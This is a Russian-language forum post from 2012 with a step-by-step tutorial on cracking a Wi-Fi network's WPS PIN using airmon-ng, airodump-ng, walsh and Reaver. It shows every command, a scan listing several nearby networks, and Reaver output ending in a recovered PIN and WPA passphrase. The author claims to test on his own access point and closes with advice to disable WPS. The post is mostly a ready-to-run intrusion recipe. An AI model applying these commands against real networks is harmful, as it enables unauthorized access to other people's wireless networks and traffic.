Показать сообщение отдельно
Старый 26.01.2012, 23:35      #1 (ссылка на пост)
levinkv
Активный пользователь
 
Аватар для levinkv
 
Регистрация: 23.01.2012
Сообщений: 54
levinkv скоро придёт к известности
Информация

По умолчанию Reaver. Взлом Wi-Fi сети

Всем привет!

Наконец то дошли руки до написания статьи по reaver. Но для начала давайте немного теории.

Wi-Fi Protected Setup (WPS) – стандарт, предназначенный для полуавтоматического создания беспроводной домашней сети, созданный Wi-Fi Alliance. Официально запущен 8 января 2007 года.

Целью протокола WPS является упрощение процесса настройки беспроводной сети, поэтому изначально он назывался Wi-Fi Simple Config. Протокол призван оказать помощь пользователям, которые не обладают широкими знаниями о безопасности в беспроводных сетях, и как следствие, имеют сложности при осуществлении настроек. WPS автоматически обозначает имя сети и задает шифрование, для защиты от несанкционированного доступа в сеть, при этом нет необходимости вручную задавать все параметры.

Push Button Configuration (PBC) – кнопка при нажатии которой осуществляется авто-поиск устройств с поддержкой WPS и дальнейшее подключение к точке доступа (AP).

Итак, для начала посмотрим, какие беспроводные интерфейсы имеются.

Код:
sudo airmon-ng
Переводим интерфейс wlan1 в режим монитора (monitor mode).

Код:
sudo airmon-ng start wlan1
После того как wi-fi интерфейс настроен, просмотрим wi-fi сети, которые находятся в зоне действия.

Код:
sudo airodump-ng mon0
Кстати, можно так же использовать программу walsh. Она позволяет просматривать точки доступа (AP), на которых включен WPS.

Код:
sudo walsh -i mon0
Код:
Scanning for supported APS...

 BC:AE:C5:71:D3:17 hub-lex-AP
 84:C9:B2:4C:E0:57 1-OJ
 00:24:01:1B:1F:B3 more
 F0:7D:68:40:46:DE Okean
 00:14:D1:E2:06:94 TRENDnet651
 14:D6:4D:B5:07:4C DomTar
Закон нарушать мне не хочется, поэтому буду экспериментировать на своей AP.

Код:
sudo reaver -i mon0 -b BC:AE:C5:71:D3:17 -vv

Код:
Reaver v1.3 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from BC:AE:C5:71:D3:17
[+] Associated with BC:AE:C5:71:D3:17 (ESSID: hub-lex-AP)
[+] 0.04% complete @ 2012-01-22 03:01:06 (5 seconds/attempt)
[+] 0.05% complete @ 2012-01-22 03:01:22 (6 seconds/attempt) 

...

[+] 96.76% complete @ 2012-01-22 05:00:31 (4 seconds/attempt)
[+] 96.81% complete @ 2012-01-22 05:00:46 (4 seconds/attempt)
[+] 96.83% complete @ 2012-01-22 05:01:07 (4 seconds/attempt)
[+] 96.85% complete @ 2012-01-22 05:01:30 (4 seconds/attempt)
[+] 96.89% complete @ 2012-01-22 05:01:43 (4 seconds/attempt)
[+] 96.92% complete @ 2012-01-22 05:02:00 (4 seconds/attempt)
[+] 96.96% complete @ 2012-01-22 05:02:14 (4 seconds/attempt)
[+] 97.01% complete @ 2012-01-22 05:02:29 (4 seconds/attempt)
[+] 97.03% complete @ 2012-01-22 05:02:41 (4 seconds/attempt)
[+] 97.05% complete @ 2012-01-22 05:03:15 (4 seconds/attempt)
[+] 97.09% complete @ 2012-01-22 05:03:29 (4 seconds/attempt)
[+] 97.14% complete @ 2012-01-22 05:03:44 (4 seconds/attempt)
[+] WPS PIN: '31150545'
[+] WPA PSK: 'elNpTxD2uimQX2b/MpDKb0UL7[STPO?tIK5k.M(V"k?P7X;jrcx'
[+] AP SSID: 'hub-lex-AP'
Как видите пароль был поставлен очень сложный, что не помешало добиться желаемого результата. Чтобы защититься от данного вида атаки, необходимо отключить службу WPS на роутере!

Вот и все. Как видите ничего сложного нет. Если возникнут вопросы, обращайтесь.

Последний раз редактировалось levinkv; 03.04.2012 в 18:19.
levinkv вне форума   Ответить с цитированием
Эти 2 пользователя(ей) сказали Спасибо levinkv за это полезное сообщение:
1234567890 (15.05.2013), dqod (10.02.2012)
 
Время генерации страницы 0.07949 секунды с 15 запросами